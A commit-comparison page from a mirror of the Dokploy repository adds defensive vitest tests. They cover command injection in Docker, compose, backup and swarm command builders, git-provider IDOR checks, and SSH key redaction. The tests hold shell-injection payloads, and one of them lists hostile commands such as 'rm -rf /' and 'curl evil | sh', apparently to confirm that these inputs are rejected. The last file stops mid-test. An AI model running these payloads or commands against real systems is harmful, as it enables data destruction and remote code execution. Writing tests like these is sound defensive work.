mirror of
https://github.com/Dokploy/dokploy.git
synced 2026-07-22 14:25:24 +02:00
Compare commits
66 Commits
fix/cmdi-g
...
v0.29.13
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
8b868c66d6 | ||
|
|
366e44b75a | ||
|
|
cb2db0d30a | ||
|
|
7ba3853bab | ||
|
|
8def9e933e | ||
|
|
e9b51667e2 | ||
|
|
25370cac30 | ||
|
|
52c7db1f66 | ||
|
|
6d65a36aac | ||
|
|
cbec72ed80 | ||
|
|
3b102fac56 | ||
|
|
b2ade17487 | ||
|
|
ffe62bca0e | ||
|
|
d3f522b7a6 | ||
|
|
4aee66b2d1 | ||
|
|
d02f34f9d4 | ||
|
|
92310ddb14 | ||
|
|
16b5b7293f | ||
|
|
d629faebc6 | ||
|
|
eeb6e7b8ea | ||
|
|
9b078e0b4c | ||
|
|
ce4be79b3d | ||
|
|
8c2e91a5e6 | ||
|
|
0514363062 | ||
|
|
ffb8d4396b | ||
|
|
5ae344db58 | ||
|
|
f339805ddf | ||
|
|
8fe3294a08 | ||
|
|
1e3f10bd22 | ||
|
|
393fb92344 | ||
|
|
79c9cf99e0 | ||
|
|
6cbc7a0031 | ||
|
|
eb1f11b908 | ||
|
|
1a3c76d1f2 | ||
|
|
1e354a3cf2 | ||
|
|
1bc76e9e5b | ||
|
|
56169f3278 | ||
|
|
479d851829 | ||
|
|
68f5afae42 | ||
|
|
637715ac66 | ||
|
|
df2779eaeb | ||
|
|
95a3556baa | ||
|
|
fbd84b9b0d | ||
|
|
d48037a802 | ||
|
|
8539a5c82f | ||
|
|
ccd2e83c57 | ||
|
|
89effbe395 | ||
|
|
b24202e69b | ||
|
|
0348f5fb38 | ||
|
|
cba0b253c7 | ||
|
|
1c31ed9969 | ||
|
|
ecbaf6060b | ||
|
|
c0afc48da8 | ||
|
|
65fe737bc4 | ||
|
|
77384b2183 | ||
|
|
68ea9f7771 | ||
|
|
182d3656bb | ||
|
|
c2c0e9c1c2 | ||
|
|
5563699f71 | ||
|
|
117cfa1a89 | ||
|
|
439eee45ed | ||
|
|
e88c6b6b4f | ||
|
|
26cae3b8a9 | ||
|
|
071d9eacee | ||
|
|
57ecfa8884 | ||
|
|
15fe3b21c9 |
@@ -0,0 +1,106 @@
|
|||||||
|
import { execSync } from "node:child_process";
|
||||||
|
import { chmodSync, existsSync, rmSync, writeFileSync } from "node:fs";
|
||||||
|
import {
|
||||||
|
getLibsqlBackupCommand,
|
||||||
|
getMariadbBackupCommand,
|
||||||
|
getMongoBackupCommand,
|
||||||
|
getMysqlBackupCommand,
|
||||||
|
getPostgresBackupCommand,
|
||||||
|
} from "@dokploy/server/utils/backups/utils";
|
||||||
|
import {
|
||||||
|
getMariadbRestoreCommand,
|
||||||
|
getMongoRestoreCommand,
|
||||||
|
getMysqlRestoreCommand,
|
||||||
|
getPostgresRestoreCommand,
|
||||||
|
} from "@dokploy/server/utils/restore/utils";
|
||||||
|
import { afterAll, beforeAll, describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
// A stub replacing the real `docker` binary. It ignores exec/-i/$CONTAINER_ID,
|
||||||
|
// exports the -e VAR=val pairs, and runs the inner `sh -c <script>` — so the
|
||||||
|
// test exercises BOTH shell layers (outer /bin/sh building the docker command,
|
||||||
|
// and the inner shell) the way production does, without needing a container.
|
||||||
|
const stub = `/tmp/docker_stub_${process.pid}`;
|
||||||
|
const MARK = `/tmp/dokploy_dbbk_pwned_${process.pid}`;
|
||||||
|
|
||||||
|
beforeAll(() => {
|
||||||
|
writeFileSync(
|
||||||
|
stub,
|
||||||
|
`#!/bin/bash
|
||||||
|
shift # exec
|
||||||
|
envs=()
|
||||||
|
while [ "$1" = "-e" ]; do envs+=("$2"); shift 2; done
|
||||||
|
shift 2 # -i CONTAINER
|
||||||
|
shell="$1"; shift # bash|sh
|
||||||
|
shift # -c
|
||||||
|
env "\${envs[@]}" "$shell" -c "$1" </dev/null 2>/dev/null || true
|
||||||
|
`,
|
||||||
|
);
|
||||||
|
chmodSync(stub, 0o755);
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(() => {
|
||||||
|
if (existsSync(stub)) rmSync(stub);
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
});
|
||||||
|
|
||||||
|
// Run a builder-produced command with `docker` pointed at the stub; return true
|
||||||
|
// if no injected command fired.
|
||||||
|
const runsSafely = (command: string) => {
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
const withStub = command.replace(/^docker /, `${stub} `);
|
||||||
|
try {
|
||||||
|
execSync(withStub, {
|
||||||
|
shell: "/bin/bash",
|
||||||
|
stdio: "ignore",
|
||||||
|
env: { ...process.env, CONTAINER_ID: "test" },
|
||||||
|
});
|
||||||
|
} catch {}
|
||||||
|
const fired = existsSync(MARK);
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
return !fired;
|
||||||
|
};
|
||||||
|
|
||||||
|
// Payloads that try to break out of every quoting style used in the builders.
|
||||||
|
const p = (mark: string) => [
|
||||||
|
`$(touch ${mark})`,
|
||||||
|
"`touch " + mark + "`",
|
||||||
|
`x'; touch ${mark}; '`,
|
||||||
|
`x"; touch ${mark}; echo "`,
|
||||||
|
`x; touch ${mark}`,
|
||||||
|
];
|
||||||
|
|
||||||
|
describe("database backup/restore command injection", () => {
|
||||||
|
const cases: Array<[string, (v: string) => string]> = [
|
||||||
|
["postgres backup (database)", (v) => getPostgresBackupCommand(v, "u")],
|
||||||
|
["postgres backup (user)", (v) => getPostgresBackupCommand("db", v)],
|
||||||
|
["mariadb backup (password)", (v) => getMariadbBackupCommand("db", "u", v)],
|
||||||
|
["mysql backup (database)", (v) => getMysqlBackupCommand(v, "pw")],
|
||||||
|
["mongo backup (user)", (v) => getMongoBackupCommand("db", v, "pw")],
|
||||||
|
["libsql backup (database)", (v) => getLibsqlBackupCommand(v)],
|
||||||
|
["postgres restore (database)", (v) => getPostgresRestoreCommand(v, "u")],
|
||||||
|
[
|
||||||
|
"mariadb restore (password)",
|
||||||
|
(v) => getMariadbRestoreCommand("db", "u", v),
|
||||||
|
],
|
||||||
|
["mysql restore (database)", (v) => getMysqlRestoreCommand(v, "pw")],
|
||||||
|
["mongo restore (user)", (v) => getMongoRestoreCommand("db", v, "pw")],
|
||||||
|
];
|
||||||
|
|
||||||
|
for (const [label, build] of cases) {
|
||||||
|
it(`${label} is not injectable`, () => {
|
||||||
|
for (const payload of p(MARK)) {
|
||||||
|
expect(runsSafely(build(payload))).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
it("preserves a legitimate database name (passed through as env var)", () => {
|
||||||
|
const cmd = getPostgresBackupCommand("my-db_prod", "app_user");
|
||||||
|
// Values live in -e assignments, never inline in the pg_dump text.
|
||||||
|
expect(cmd).toContain("-e DB_NAME=my-db_prod");
|
||||||
|
expect(cmd).toContain("-e DB_USER=app_user");
|
||||||
|
expect(cmd).toContain(
|
||||||
|
'pg_dump -Fc --no-acl --no-owner -h localhost -U "$DB_USER"',
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
@@ -0,0 +1,70 @@
|
|||||||
|
import { execSync } from "node:child_process";
|
||||||
|
import { existsSync, rmSync } from "node:fs";
|
||||||
|
import { getRegistryTag } from "@dokploy/server/utils/cluster/upload";
|
||||||
|
import { parse, quote } from "shell-quote";
|
||||||
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
const MARK = `/tmp/dokploy_regnode_pwned_${process.pid}`;
|
||||||
|
|
||||||
|
const runsSafely = (command: string) => {
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
try {
|
||||||
|
execSync(command, { shell: "/bin/sh", stdio: "ignore" });
|
||||||
|
} catch {}
|
||||||
|
const fired = existsSync(MARK);
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
return !fired;
|
||||||
|
};
|
||||||
|
|
||||||
|
const PAYLOADS = (m: string) => [
|
||||||
|
`$(touch ${m})`,
|
||||||
|
"`touch " + m + "`",
|
||||||
|
`x; touch ${m}`,
|
||||||
|
`x | touch ${m}`,
|
||||||
|
];
|
||||||
|
|
||||||
|
describe("cluster removeWorker nodeId injection", () => {
|
||||||
|
// docker node update/rm ${quote([nodeId])} — replace `docker node` with `:`.
|
||||||
|
it("escapes nodeId in drain/remove commands", () => {
|
||||||
|
for (const nodeId of PAYLOADS(MARK)) {
|
||||||
|
const drain = `: node update --availability drain ${quote([nodeId])}`;
|
||||||
|
const remove = `: node rm ${quote([nodeId])} --force`;
|
||||||
|
expect(runsSafely(drain)).toBe(true);
|
||||||
|
expect(runsSafely(remove)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe("swarm upload registry tag/push injection", () => {
|
||||||
|
// registryTag is built from registryUrl/username/imagePrefix (username and
|
||||||
|
// imagePrefix have no schema regex). Assert docker tag/push stay safe.
|
||||||
|
it("escapes a malicious imagePrefix flowing into the registry tag", () => {
|
||||||
|
for (const payload of PAYLOADS(MARK)) {
|
||||||
|
const registryTag = getRegistryTag(
|
||||||
|
{
|
||||||
|
registryUrl: "registry.example.com",
|
||||||
|
imagePrefix: payload,
|
||||||
|
username: "user",
|
||||||
|
} as any,
|
||||||
|
"app:latest",
|
||||||
|
);
|
||||||
|
const tagCmd = `: tag ${quote(["app:latest"])} ${quote([registryTag])}`;
|
||||||
|
const pushCmd = `: push ${quote([registryTag])}`;
|
||||||
|
expect(runsSafely(tagCmd)).toBe(true);
|
||||||
|
expect(runsSafely(pushCmd)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("keeps a legitimate registry tag intact", () => {
|
||||||
|
const tag = getRegistryTag(
|
||||||
|
{
|
||||||
|
registryUrl: "registry.example.com",
|
||||||
|
imagePrefix: "team",
|
||||||
|
username: "user",
|
||||||
|
} as any,
|
||||||
|
"myapp:1.2.3",
|
||||||
|
);
|
||||||
|
expect(tag).toBe("registry.example.com/team/myapp:1.2.3");
|
||||||
|
expect(parse(quote([tag]))).toEqual([tag]);
|
||||||
|
});
|
||||||
|
});
|
||||||
104
apps/dokploy/__test__/compose/compose-command-injection.test.ts
Normal file
104
apps/dokploy/__test__/compose/compose-command-injection.test.ts
Normal file
@@ -0,0 +1,104 @@
|
|||||||
|
import { execSync } from "node:child_process";
|
||||||
|
import { existsSync, rmSync } from "node:fs";
|
||||||
|
import { createCommand } from "@dokploy/server/utils/builders/compose";
|
||||||
|
import { parse, quote } from "shell-quote";
|
||||||
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
const MARK = `/tmp/dokploy_compose_pwned_${process.pid}`;
|
||||||
|
|
||||||
|
const base = {
|
||||||
|
composeType: "docker-compose" as const,
|
||||||
|
appName: "compose-app",
|
||||||
|
sourceType: "raw" as const,
|
||||||
|
command: "",
|
||||||
|
composePath: "docker-compose.yml",
|
||||||
|
};
|
||||||
|
|
||||||
|
// createCommand output is interpolated as `docker ${command}` at the deploy
|
||||||
|
// sink; run `: ${command}` (docker -> no-op) and assert no injection fires.
|
||||||
|
const runsSafely = (command: string) => {
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
try {
|
||||||
|
execSync(`: ${command}`, { shell: "/bin/sh", stdio: "ignore" });
|
||||||
|
} catch {}
|
||||||
|
const fired = existsSync(MARK);
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
return !fired;
|
||||||
|
};
|
||||||
|
|
||||||
|
const PAYLOADS = [
|
||||||
|
`$(touch ${MARK})`,
|
||||||
|
"`touch " + MARK + "`",
|
||||||
|
`x; touch ${MARK}`,
|
||||||
|
`x | touch ${MARK}`,
|
||||||
|
];
|
||||||
|
|
||||||
|
describe("compose createCommand injection", () => {
|
||||||
|
it("escapes composePath (docker-compose)", () => {
|
||||||
|
for (const p of PAYLOADS) {
|
||||||
|
const cmd = createCommand({
|
||||||
|
...base,
|
||||||
|
sourceType: "github",
|
||||||
|
composePath: p,
|
||||||
|
} as any);
|
||||||
|
expect(runsSafely(cmd)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("escapes composePath (stack deploy)", () => {
|
||||||
|
for (const p of PAYLOADS) {
|
||||||
|
const cmd = createCommand({
|
||||||
|
...base,
|
||||||
|
composeType: "stack",
|
||||||
|
sourceType: "github",
|
||||||
|
composePath: p,
|
||||||
|
} as any);
|
||||||
|
expect(runsSafely(cmd)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("escapes appName", () => {
|
||||||
|
for (const p of PAYLOADS) {
|
||||||
|
const cmd = createCommand({
|
||||||
|
...base,
|
||||||
|
sourceType: "github",
|
||||||
|
appName: p,
|
||||||
|
composePath: "docker-compose.yml",
|
||||||
|
} as any);
|
||||||
|
expect(runsSafely(cmd)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("rejects a custom command containing shell control characters", () => {
|
||||||
|
for (const bad of [
|
||||||
|
"up -d; rm -rf /",
|
||||||
|
"up && curl evil | sh",
|
||||||
|
"up $(touch x)",
|
||||||
|
"up `id`",
|
||||||
|
]) {
|
||||||
|
expect(() => createCommand({ ...base, command: bad } as any)).toThrow(
|
||||||
|
/Invalid characters/,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows a legitimate custom command", () => {
|
||||||
|
const cmd = createCommand({
|
||||||
|
...base,
|
||||||
|
command: "compose -f docker-compose.yml -p app up -d --build",
|
||||||
|
} as any);
|
||||||
|
expect(cmd).toBe("compose -f docker-compose.yml -p app up -d --build");
|
||||||
|
});
|
||||||
|
|
||||||
|
it("keeps a legitimate composePath intact", () => {
|
||||||
|
const cmd = createCommand({
|
||||||
|
...base,
|
||||||
|
sourceType: "github",
|
||||||
|
composePath: "deploy/docker-compose.prod.yml",
|
||||||
|
} as any);
|
||||||
|
expect(parse(cmd)).toContain("deploy/docker-compose.prod.yml");
|
||||||
|
expect(quote(["deploy/docker-compose.prod.yml"])).toBe(
|
||||||
|
"deploy/docker-compose.prod.yml",
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
@@ -0,0 +1,41 @@
|
|||||||
|
import { execSync } from "node:child_process";
|
||||||
|
import { existsSync, rmSync } from "node:fs";
|
||||||
|
import { parse, quote } from "shell-quote";
|
||||||
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
// The six database deploy functions (postgres/mysql/mariadb/mongo/redis/libsql)
|
||||||
|
// build `docker pull ${quote([dockerImage])}` for the remote (execAsyncRemote)
|
||||||
|
// path. `docker` is replaced by `:` so only the injection surface is exercised.
|
||||||
|
const MARK = `/tmp/dokploy_dbimg_pwned_${process.pid}`;
|
||||||
|
|
||||||
|
const PAYLOADS = [
|
||||||
|
"$(touch %MARK%)",
|
||||||
|
"`touch %MARK%`",
|
||||||
|
"redis:7; touch %MARK%",
|
||||||
|
"redis:7 && touch %MARK%",
|
||||||
|
"redis:7 | touch %MARK%",
|
||||||
|
];
|
||||||
|
|
||||||
|
describe("database service dockerImage command injection", () => {
|
||||||
|
it("does not execute injected commands from dockerImage", () => {
|
||||||
|
for (const template of PAYLOADS) {
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
const dockerImage = template.replace("%MARK%", MARK);
|
||||||
|
const command = `: pull ${quote([dockerImage])}`;
|
||||||
|
try {
|
||||||
|
execSync(command, { shell: "/bin/sh", stdio: "ignore" });
|
||||||
|
} catch {}
|
||||||
|
expect(existsSync(MARK)).toBe(false);
|
||||||
|
}
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("keeps a legitimate image tag intact", () => {
|
||||||
|
expect(parse(quote(["postgres:16.4-alpine"]))).toEqual([
|
||||||
|
"postgres:16.4-alpine",
|
||||||
|
]);
|
||||||
|
expect(parse(quote(["ghcr.io/org/db:latest"]))).toEqual([
|
||||||
|
"ghcr.io/org/db:latest",
|
||||||
|
]);
|
||||||
|
});
|
||||||
|
});
|
||||||
66
apps/dokploy/__test__/deploy/docker-build-injection.test.ts
Normal file
66
apps/dokploy/__test__/deploy/docker-build-injection.test.ts
Normal file
@@ -0,0 +1,66 @@
|
|||||||
|
import { execSync } from "node:child_process";
|
||||||
|
import { existsSync, rmSync } from "node:fs";
|
||||||
|
import { parse, quote } from "shell-quote";
|
||||||
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
// Reproduces the escaping applied at the docker build/pull sinks and asserts no
|
||||||
|
// payload can break out of the command. `docker`/`cd` are replaced by `:` so the
|
||||||
|
// test exercises only the injection surface, not real docker.
|
||||||
|
const MARK = `/tmp/dokploy_docker_pwned_${process.pid}`;
|
||||||
|
|
||||||
|
const runAndCheckSafe = (command: string) => {
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
try {
|
||||||
|
execSync(command, { shell: "/bin/sh", stdio: "ignore" });
|
||||||
|
} catch {
|
||||||
|
// no-op stand-ins may exit non-zero; only the marker matters.
|
||||||
|
}
|
||||||
|
const fired = existsSync(MARK);
|
||||||
|
if (existsSync(MARK)) rmSync(MARK);
|
||||||
|
return !fired;
|
||||||
|
};
|
||||||
|
|
||||||
|
const PAYLOADS = [
|
||||||
|
"$(touch %MARK%)",
|
||||||
|
"`touch %MARK%`",
|
||||||
|
"x; touch %MARK%",
|
||||||
|
"x && touch %MARK%",
|
||||||
|
"x | touch %MARK%",
|
||||||
|
];
|
||||||
|
|
||||||
|
describe("docker build/pull command injection", () => {
|
||||||
|
it("dockerImage (buildRemoteDocker: docker pull / echo) is escaped", () => {
|
||||||
|
for (const p of PAYLOADS) {
|
||||||
|
const dockerImage = p.replace("%MARK%", MARK);
|
||||||
|
const command = `: pull ${quote([dockerImage])}; : echo ${quote([`Pulling ${dockerImage}`])}`;
|
||||||
|
expect(runAndCheckSafe(command)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("dockerContextPath (docker-file: cd) is escaped", () => {
|
||||||
|
for (const p of PAYLOADS) {
|
||||||
|
const dockerContextPath = p.replace("%MARK%", MARK);
|
||||||
|
const command = `: cd ${quote([dockerContextPath])}`;
|
||||||
|
expect(runAndCheckSafe(command)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("publishDirectory (nixpacks: docker cp source path) is escaped", () => {
|
||||||
|
for (const p of PAYLOADS) {
|
||||||
|
const publishDirectory = p.replace("%MARK%", MARK);
|
||||||
|
const containerId = "buildabc";
|
||||||
|
const command = `: cp ${quote([`${containerId}:/app/${publishDirectory}/.`])} /dest`;
|
||||||
|
expect(runAndCheckSafe(command)).toBe(true);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it("keeps a legitimate image / path intact as a single token", () => {
|
||||||
|
// Escaping may add backslashes (e.g. before ':'), but the shell must parse
|
||||||
|
// the result back to exactly the original single token.
|
||||||
|
expect(parse(quote(["nginx:1.27-alpine"]))).toEqual(["nginx:1.27-alpine"]);
|
||||||
|
expect(parse(quote(["registry.io/team/app:tag"]))).toEqual([
|
||||||
|
"registry.io/team/app:tag",
|
||||||
|
]);
|
||||||
|
expect(parse(quote(["dist/static"]))).toEqual(["dist/static"]);
|
||||||
|
});
|
||||||
|
});
|
||||||
@@ -1,8 +1,10 @@
|
|||||||
import { cloneGitRepository } from "@dokploy/server/utils/providers/git";
|
import { cloneGitRepository } from "@dokploy/server/utils/providers/git";
|
||||||
import { shellWord } from "@dokploy/server/utils/providers/utils";
|
import { parse, quote } from "shell-quote";
|
||||||
import { parse } from "shell-quote";
|
|
||||||
import { describe, expect, it } from "vitest";
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
// How git-provider commands escape a single user value before it reaches the shell.
|
||||||
|
const shellArg = (value: string) => quote([String(value ?? "")]);
|
||||||
|
|
||||||
// Payloads that, if reached a shell unescaped, would execute commands.
|
// Payloads that, if reached a shell unescaped, would execute commands.
|
||||||
const INJECTION_PAYLOADS = [
|
const INJECTION_PAYLOADS = [
|
||||||
"$(touch /tmp/pwned)",
|
"$(touch /tmp/pwned)",
|
||||||
@@ -24,10 +26,10 @@ const LEGIT_VALUES = [
|
|||||||
"https://gitlab.example.com/group/sub/project.git",
|
"https://gitlab.example.com/group/sub/project.git",
|
||||||
];
|
];
|
||||||
|
|
||||||
describe("shellWord (git provider shell escaping)", () => {
|
describe("git provider shell escaping (quote)", () => {
|
||||||
it("collapses every injection payload into a single literal token (no shell operators)", () => {
|
it("collapses every injection payload into a single literal token (no shell operators)", () => {
|
||||||
for (const payload of INJECTION_PAYLOADS) {
|
for (const payload of INJECTION_PAYLOADS) {
|
||||||
const parsed = parse(shellWord(payload));
|
const parsed = parse(shellArg(payload));
|
||||||
// A safely escaped value parses back to exactly the original string,
|
// A safely escaped value parses back to exactly the original string,
|
||||||
// as ONE token. If escaping failed, parse() would emit operator
|
// as ONE token. If escaping failed, parse() would emit operator
|
||||||
// objects such as { op: ";" } or { op: "$(" } instead.
|
// objects such as { op: ";" } or { op: "$(" } instead.
|
||||||
@@ -37,7 +39,7 @@ describe("shellWord (git provider shell escaping)", () => {
|
|||||||
|
|
||||||
it("leaves legitimate URLs and branch names intact", () => {
|
it("leaves legitimate URLs and branch names intact", () => {
|
||||||
for (const value of LEGIT_VALUES) {
|
for (const value of LEGIT_VALUES) {
|
||||||
expect(parse(shellWord(value))).toEqual([value]);
|
expect(parse(shellArg(value))).toEqual([value]);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|||||||
91
apps/dokploy/__test__/git-provider/git-provider-idor.test.ts
Normal file
91
apps/dokploy/__test__/git-provider/git-provider-idor.test.ts
Normal file
@@ -0,0 +1,91 @@
|
|||||||
|
import { TRPCError } from "@trpc/server";
|
||||||
|
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||||
|
|
||||||
|
// Mock the DB so the REAL getAccessibleGitProviderIds (called internally by
|
||||||
|
// assertGitProviderAccess) runs against controlled data. Mocking the exported
|
||||||
|
// function would NOT intercept the intra-module call, so we mock one layer down.
|
||||||
|
const mockDb = vi.hoisted(() => ({
|
||||||
|
query: {
|
||||||
|
gitProvider: {
|
||||||
|
findMany: vi.fn(),
|
||||||
|
},
|
||||||
|
member: {
|
||||||
|
findFirst: vi.fn(),
|
||||||
|
},
|
||||||
|
},
|
||||||
|
}));
|
||||||
|
vi.mock("@dokploy/server/db", () => ({ db: mockDb }));
|
||||||
|
|
||||||
|
const mockHasValidLicense = vi.hoisted(() => vi.fn());
|
||||||
|
vi.mock("@dokploy/server/services/proprietary/license-key", () => ({
|
||||||
|
hasValidLicense: mockHasValidLicense,
|
||||||
|
}));
|
||||||
|
|
||||||
|
import { assertGitProviderAccess } from "@dokploy/server/services/git-provider";
|
||||||
|
|
||||||
|
const ORG = "org-1";
|
||||||
|
const USER = "user-member";
|
||||||
|
const session = { userId: USER, activeOrganizationId: ORG };
|
||||||
|
|
||||||
|
// Provider owned by USER within ORG -> should be accessible.
|
||||||
|
const providerMine = {
|
||||||
|
gitProviderId: "gp-mine",
|
||||||
|
userId: USER,
|
||||||
|
sharedWithOrganization: false,
|
||||||
|
};
|
||||||
|
// Provider owned by someone else within ORG, not shared, not assigned.
|
||||||
|
const providerOther = {
|
||||||
|
gitProviderId: "gp-other",
|
||||||
|
userId: "user-2",
|
||||||
|
sharedWithOrganization: false,
|
||||||
|
};
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
vi.clearAllMocks();
|
||||||
|
mockHasValidLicense.mockResolvedValue(false);
|
||||||
|
mockDb.query.gitProvider.findMany.mockResolvedValue([
|
||||||
|
providerMine,
|
||||||
|
providerOther,
|
||||||
|
]);
|
||||||
|
mockDb.query.member.findFirst.mockResolvedValue({
|
||||||
|
role: "member",
|
||||||
|
accessedGitProviders: [],
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe("assertGitProviderAccess (git provider IDOR guard)", () => {
|
||||||
|
it("rejects a provider from another organization with NOT_FOUND (cross-org IDOR)", async () => {
|
||||||
|
await expect(
|
||||||
|
assertGitProviderAccess(session, {
|
||||||
|
gitProviderId: "gp-mine",
|
||||||
|
organizationId: "org-2",
|
||||||
|
}),
|
||||||
|
).rejects.toMatchObject({ code: "NOT_FOUND" });
|
||||||
|
});
|
||||||
|
|
||||||
|
it("rejects a same-org provider the caller is not entitled to with FORBIDDEN", async () => {
|
||||||
|
await expect(
|
||||||
|
assertGitProviderAccess(session, {
|
||||||
|
gitProviderId: "gp-other",
|
||||||
|
organizationId: ORG,
|
||||||
|
}),
|
||||||
|
).rejects.toMatchObject({ code: "FORBIDDEN" });
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows a same-org provider the caller owns", async () => {
|
||||||
|
await expect(
|
||||||
|
assertGitProviderAccess(session, {
|
||||||
|
gitProviderId: "gp-mine",
|
||||||
|
organizationId: ORG,
|
||||||
|
}),
|
||||||
|
).resolves.toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
|
it("throws a TRPCError so tRPC maps the HTTP status", async () => {
|
||||||
|
const err = await assertGitProviderAccess(session, {
|
||||||
|
gitProviderId: "gp-mine",
|
||||||
|
organizationId: "org-2",
|
||||||
|
}).catch((e) => e);
|
||||||
|
expect(err).toBeInstanceOf(TRPCError);
|
||||||
|
});
|
||||||
|
});
|
||||||
44
apps/dokploy/__test__/server/server-sshkey-redaction.test.ts
Normal file
44
apps/dokploy/__test__/server/server-sshkey-redaction.test.ts
Normal file
@@ -0,0 +1,44 @@
|
|||||||
|
import { redactServerSshKey } from "@dokploy/server/services/server";
|
||||||
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
describe("redactServerSshKey (server SSH private key disclosure guard)", () => {
|
||||||
|
it("blanks the private key while keeping the rest of the ssh key intact", () => {
|
||||||
|
const server = {
|
||||||
|
serverId: "srv-1",
|
||||||
|
name: "prod",
|
||||||
|
sshKey: {
|
||||||
|
sshKeyId: "key-1",
|
||||||
|
publicKey: "ssh-ed25519 AAAA...",
|
||||||
|
privateKey: "-----BEGIN OPENSSH PRIVATE KEY-----\nsecret\n",
|
||||||
|
},
|
||||||
|
};
|
||||||
|
|
||||||
|
const redacted = redactServerSshKey(server);
|
||||||
|
|
||||||
|
expect(redacted.sshKey.privateKey).toBe("");
|
||||||
|
// Non-secret fields and the surrounding record must survive untouched.
|
||||||
|
expect(redacted.sshKey.publicKey).toBe("ssh-ed25519 AAAA...");
|
||||||
|
expect(redacted.serverId).toBe("srv-1");
|
||||||
|
expect(redacted.name).toBe("prod");
|
||||||
|
});
|
||||||
|
|
||||||
|
it("does not mutate the original record", () => {
|
||||||
|
const server = {
|
||||||
|
serverId: "srv-1",
|
||||||
|
sshKey: { privateKey: "top-secret" },
|
||||||
|
};
|
||||||
|
redactServerSshKey(server);
|
||||||
|
expect(server.sshKey.privateKey).toBe("top-secret");
|
||||||
|
});
|
||||||
|
|
||||||
|
it("is a no-op when the server has no ssh key", () => {
|
||||||
|
const server = { serverId: "srv-2", sshKey: null };
|
||||||
|
expect(redactServerSshKey(server)).toEqual(server);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("handles a record without a loaded sshKey relation", () => {
|
||||||
|
// e.g. server.update returns the plain row where sshKey is not populated.
|
||||||
|
const server: { serverId: string; sshKey?: null } = { serverId: "srv-3" };
|
||||||
|
expect(redactServerSshKey(server)).toEqual(server);
|
||||||
|
});
|
||||||
|
});
|
||||||
41
apps/dokploy/__test__/server/swarm-nodeid-injection.test.ts
Normal file
41
apps/dokploy/__test__/server/swarm-nodeid-injection.test.ts
Normal file
@@ -0,0 +1,41 @@
|
|||||||
|
import { execSync } from "node:child_process";
|
||||||
|
import { existsSync, rmSync } from "node:fs";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
|
import { describe, expect, it } from "vitest";
|
||||||
|
|
||||||
|
// Mirrors how getNodeInfo builds its command in services/docker.ts:
|
||||||
|
// `docker node inspect ${quote([nodeId])} --format '{{json .}}'`
|
||||||
|
// We swap `docker node inspect` for `:` (a no-op) so the test only exercises
|
||||||
|
// whether the nodeId payload can break out of the command, not real docker.
|
||||||
|
const buildCommand = (nodeId: string) =>
|
||||||
|
`: node inspect ${quote([nodeId])} --format '{{json .}}'`;
|
||||||
|
|
||||||
|
const INJECTION_NODE_IDS = [
|
||||||
|
"$(touch %MARK%)",
|
||||||
|
"`touch %MARK%`",
|
||||||
|
"; touch %MARK%",
|
||||||
|
"abc | touch %MARK%",
|
||||||
|
"&& touch %MARK%",
|
||||||
|
];
|
||||||
|
|
||||||
|
describe("getNodeInfo nodeId command injection", () => {
|
||||||
|
it("does not execute injected commands from the nodeId", () => {
|
||||||
|
const mark = `/tmp/dokploy_swarm_pwned_${process.pid}`;
|
||||||
|
for (const template of INJECTION_NODE_IDS) {
|
||||||
|
if (existsSync(mark)) rmSync(mark);
|
||||||
|
const nodeId = template.replace("%MARK%", mark);
|
||||||
|
try {
|
||||||
|
execSync(buildCommand(nodeId), { shell: "/bin/sh", stdio: "ignore" });
|
||||||
|
} catch {
|
||||||
|
// A non-zero exit from the no-op is fine; we only care about the marker.
|
||||||
|
}
|
||||||
|
expect(existsSync(mark)).toBe(false);
|
||||||
|
}
|
||||||
|
if (existsSync(mark)) rmSync(mark);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("keeps a legitimate node id intact as a single literal token", () => {
|
||||||
|
const nodeId = "abc123def456";
|
||||||
|
